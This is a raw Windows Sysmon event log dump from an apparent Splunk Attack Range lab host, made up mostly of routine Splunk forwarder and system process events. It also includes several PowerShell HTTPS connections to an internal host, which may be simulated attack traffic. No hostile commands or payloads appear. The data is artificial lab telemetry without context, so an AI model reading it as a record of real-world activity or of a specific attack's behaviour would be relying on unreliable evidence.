Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D231E2BA00F5AF11C71DF19DA212340,SHA256=D387AC47FCC660B1BCF602443A5134F47543159A7378F0D4E296352B3700A5FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:25.224{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECF008A786C0E164F6AA5160EA3BE716,SHA256=990D1DBC48F93AAE853129C21E7C50DBD033BE503C32C74062DE533AA6CFCC24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:25.057{B81B27B7-A06C-6140-7156-04000000C801}66327096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036497047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:54.739{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50487-false10.0.1.12-8000- 
354300x800000000000000036497046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:54.608{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50486-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:26.538{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E968B785FD56FA514A19D32130C33144,SHA256=84F2C2A64176016740653C0320F7D983CCFE576943F34787E6E7595FD6899DA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:27.554{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3D2094068D8C3FD43C86B25F779F475,SHA256=9FF4AD0D58D56DC5EDA58316C764958F0B9D32C085E953D677F73FCBC3E567B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:28.954{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=74B4FD04E9D5B97340C96F87C49332E5,SHA256=3323859A076C2D95D66D5500389B0BB0B65ACB5AEC68F07B166A0B9640B86103,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036497054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:28.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7981CE78437E1D9E640549B8480B3C3A,SHA256=6EDE695F3708B6245F854D1DF5B36FEB08BB5A12249216CDF52918B8FF5BE3B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:59.619{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50488-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:29.638{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F572A33CF39B0E2936B7C4960393C892,SHA256=BBAA3C240D5FC8E33F511087D7AD0AF2CCB394AED560F2AE7668A3B3616A7B6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:30.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DE6D9D4651B0CA7848AB665D9CDEA77,SHA256=7D7C68FE97FAB5C19332AC55A3DF6855CB46241F8E072614D0FE2B31247F8A88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:31.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AF5CB95CFCEA628CBC147D11B29C80E,SHA256=F89CA74788BCF4E95CAE8AB30CFFFC3A6AEF5E4E38EF6EDB307B3CE008A5D4D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:00.736{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50489-false10.0.1.12-8000- 23542300x800000000000000036497062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:32.704{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5272CB874A2A900F5528B85472791F2,SHA256=02E668B1D122CFE031C774665EB1BF1E976BD4A0B02D6BFFDF649BD9612A0DF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:32.489{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:33.752{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11007CDD9891B09A5F941DA52C3B652B,SHA256=3C354BC49BA84087E869E37FE79E1D5745A1542FCF08DADAD21642C1C096E8AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:34.973{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=33A32C44E1E933877F29066E2DCBDB44,SHA256=9B96592850873B9A919A56F193C5EA14A4C01B2709965F4A95A10FDE1BCD871F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:34.755{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22EA01976CE0798604716ADF9AF82492,SHA256=60EC1D160D5FB5871C2663DA439F1B4C042E49818049ABB6DE22C1C54F9D2A04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036497064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:04.155{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50490-false10.0.1.12-8089- 23542300x800000000000000036497068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:35.773{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E331F90B710FB20AD70FDCFC9C944D1,SHA256=B106B163F10BB7659D242618DA87CDB23660D2F996115497FCEB65A3AC5B5F2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:05.634{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50491-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:36.788{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51F9AB5D3007DA59A4C8C921F7D9ABBA,SHA256=50B2D9BA0381507ECCC71EBD9C039055749BA6F61E5AF74FB11F00AC1F7D6931,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:37.918{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A079-6140-7256-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:37.918{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:37.918{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A079-6140-7256-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A079-6140-7256-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.903{B81B27B7-A079-6140-7256-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.794{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F23066A3A6E6E03249DECC6301BA2F8,SHA256=BA8AA419ECD4C3BA14A2C8D6A0724A2EB807356B61DF0821CF24F9A77ED57E6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036497070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:06.756{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50492-false10.0.1.12-8000- 23542300x800000000000000036497092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26F84F1BC30CFF57779AAEF8B11297CD,SHA256=6CD053D984782F311C8BC5CD90458C039C54F3B7A7FCEC2D7FFD398CD4C3EEBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D231E2BA00F5AF11C71DF19DA212340,SHA256=D387AC47FCC660B1BCF602443A5134F47543159A7378F0D4E296352B3700A5FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.832{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2254AB61E3C321B7DFDB004ED75AB3D,SHA256=305EA6AC28D2514E882556B88E14F9BD5AC09E762D6748ED75EFDBB4F1BF6A81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
10341000x800000000000000036497089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.770{B81B27B7-A07A-6140-7356-04000000C801}65845356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.617{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A07A-6140-7356-04000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:38.617{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.617{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:38.617{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 